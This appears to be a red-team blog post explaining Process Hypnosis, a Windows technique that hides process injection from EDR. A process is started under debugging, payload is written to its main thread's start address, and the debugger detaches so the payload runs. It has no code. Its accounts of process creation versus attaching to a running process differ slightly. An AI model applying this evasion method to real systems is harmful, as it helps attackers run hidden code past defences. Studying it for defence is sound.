Tick…tock…tick…tock…tick…tock… you are entering a state of deep sleep. You will now listen to me and do as I say, “You will gift me a PS5”. Now, when I say three, you will wake up. 1…2…3.

2 months later…

Vaow! A brand new PS5. I totally forgot about this one!

Ok. That was a little more dramatic than I wanted it to be but it explains the point well. Hypnotize → insert instructions → execute.

This is how Process Hypnosis technique works in theory. It was developed by Carlos Garrido as an alternative way to achieve process injection away from the prying eyes of EDR.

In this technique, a process is created with debug privileges, due to which the process will start in debugged state, and all new threads will be in frozen state (or hypnotic state). When threads are in the frozen state, it is possible to read the start address of the main thread of the process and write to it as well. This privilege is used to write a red team operator controlled payload to the start address of the main thread of the process. The process is then resumed by detaching the debugger, without killing the process. This leads to the execution of the red team operator’s payload.

What makes this technique unique is that neither does it use any of the commonly used Windows APIs (such as CreateProcessW, GetModuleHandle, GetProcAddress etc.) for process injection nor it creates a new process in the suspended state. This provides certain stealth to this technique since most EDRs are not looking for the artifacts used by this technique.

The following video provides the demonstration of this technique in my lab.

Red Team Notes
- In technical terms, Process Hypnosis is a technique that allows attackers to hijack the control flow of a running process by leveraging debugging functionalities. This approach operates by attaching a debugger to the target process, freezing its execution, and modifying its memory directly. 
- It does not utilize APIs such as VirtualAllocEx and CreateRemoteThread which are common in traditional process injection methods. 
- This method can evade common security defenses that monitor for standard injection patterns.

Follow my journey of 100 Days of Red Team on WhatsApp or Discord.

If you want to dive deep into the technical details of how Process Hypnosis works, read the original research published by Carlos Garrido. Carlos has also published a C++ PoC for this technique. Also check this PoC in Rust developed by João Victor.